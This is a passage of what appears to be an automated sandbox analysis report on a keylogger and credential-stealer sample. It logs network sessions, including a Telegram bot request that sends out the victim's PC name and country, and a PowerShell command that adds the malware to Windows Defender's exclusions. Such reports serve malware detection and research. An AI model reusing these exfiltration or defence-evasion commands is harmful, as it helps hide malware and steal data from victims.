2024-09-25 19:54:21 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46120 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BZRqU0xegnBsamYPWhe%2BFbKI5XD0hZOs%2F9mQe4ksf8gYHSfyy6v8BLe6T8fBrZoi3fngf%2BDjYmzTVw2rPyRmCSq6JIymf4myKp78aoMdwkstEQKPtz3sU6j1NkolaS4B3a0uro4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90cd5988c334-EWR
2024-09-25 19:54:21 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49706	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:22 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 19:54:22 UTC	676	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:22 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46121 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Z2sT11qEhzXEuI%2BZMZkP3o4nEOaNmRRLsvnPM7JCble9DvkYtsBCcaL%2BN7IrwSN0nPo1ybdNs898a2hoUdulqbl2KlWTJeYw255SzdnIHnlkY%2FuIEpl4wLV2flK5ZRphuL5kk4n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90d2f84f0f71-EWR
2024-09-25 19:54:22 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:23 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 19:54:24 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46123 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBx4gctr7Vm451O6kAC4aZjC3Opgqxkay4%2F0zy7tEt8gC7LROme4nnVgf%2FidT%2FHGX2ynSwYSvzXYOqudyzHksr4U1A5KcEeVVbRGR%2BngI9Tydc2CMVtKa8oER3J4o0wPXTX3trD5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90dc69404406-EWR
2024-09-25 19:54:24 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 19:54:25 UTC	680	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46124 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0WfwhHeqGi4ybPTzhquR0VW9JJjgwRJjc7gk%2FbtA5wScTrGTypKnvaGMC5Nr25G7xT%2Fc538oI%2F3HzV1Mp7tUgVUxVhaVIV1oL6S%2FTnMLQxV%2FW42zU3v6I0S0eNKSk1gNqpoIeLe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90e459dc4302-EWR
2024-09-25 19:54:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:26 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 19:54:26 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:26 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46125 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gk3Fx8tbtNPEyPvk0XQ0Kj8BKREr3WvCKyl%2BEaabXSHsUzwBBv0e7Yoh7l5GyRx0%2B3esE4GdRx0ze%2FgKhiwMuKPznekiTQxM9Ua0uGKobsI8zrau8mtNiNG6CQCv6FovW4FLSu%2Fp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90ec4de742e6-EWR
2024-09-25 19:54:26 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49716	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:27 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 19:54:28 UTC	682	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46127 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdJPGq1dKOojjXFyk7F3ec2%2B%2FzNYgBAJDJutPdpUQL2ONHNw7HQQCBotRHMsRH7CWfGKxPUCn%2BuExctPh3Y5QaO%2BjHvtJQXtpc1uQeCAp4S%2BvO9GFNiBkBJ3MwLT4%2BcVloZ45FVO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90f53d4643e9-EWR
2024-09-25 19:54:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49718	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:29 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 19:54:29 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46128 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vm%2BTNL9j1dZX1gI6gWqJMup3fdXk47b6xQ4v8uJw%2BVxIbYRnBHF1RQdXoXbwJabEUGR7QlS6RaNP%2BcwqagZFLWYp4kBWiDWmKAxm1wYMXQ8XGS6bUMra2%2Bv3KIYRZvzvrqYu14xI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d90fd0963429d-EWR
2024-09-25 19:54:29 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49720	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:30 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-25 19:54:30 UTC	682	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46129 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vIbY2UjQcVHMApjGVQEqX9jTJAezc0dVSNXF3PLn67QKhyzcLhbtV%2F%2FNo%2Bik%2FeyU9TXUdpijFmpV%2FQ%2BUtSzLAa59MLNXYddpZ03LTAlUo63KslwKEDWhCL1DnUWuvGG2QWWWtEtG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d9104dc8342de-EWR
2024-09-25 19:54:30 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49722	188.114.97.3	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:31 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-25 19:54:31 UTC	678	IN	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 19:54:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 46130 Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YSTq6btC95XYhaQ6fo2vIai74WCB8sdQVST91%2FsQv0m3SSXdrH0VHsJBJ8KINSPdchDKmh%2BWBkRuLizU3xctQUAgg%2BVh4buAGgz7zxTHKYqquH1PMHjD6gJ8VI5%2FIuJd8ZutswG5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8d910c996d1986-EWR
2024-09-25 19:54:31 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 19:54:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49723	149.154.167.220	443	7600	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-25 19:54:32 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2026/09/2024%20/%2003:19:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-25 19:54:32 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 25 Sep 2024 19:54:32 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-25 19:54:32 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	15:54:16
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Imagebase:	0x130000
File size:	694'272 bytes
MD5 hash:	48977F1B641A9A3D88329AC470152381
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1381482230.0000000003479000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:54:17
Start date:	25/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Imagebase:	0x4a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:54:17
Start date:	25/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:54:17
Start date:	25/09/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe"
Imagebase:	0xd50000
File size:	694'272 bytes
MD5 hash:	48977F1B641A9A3D88329AC470152381
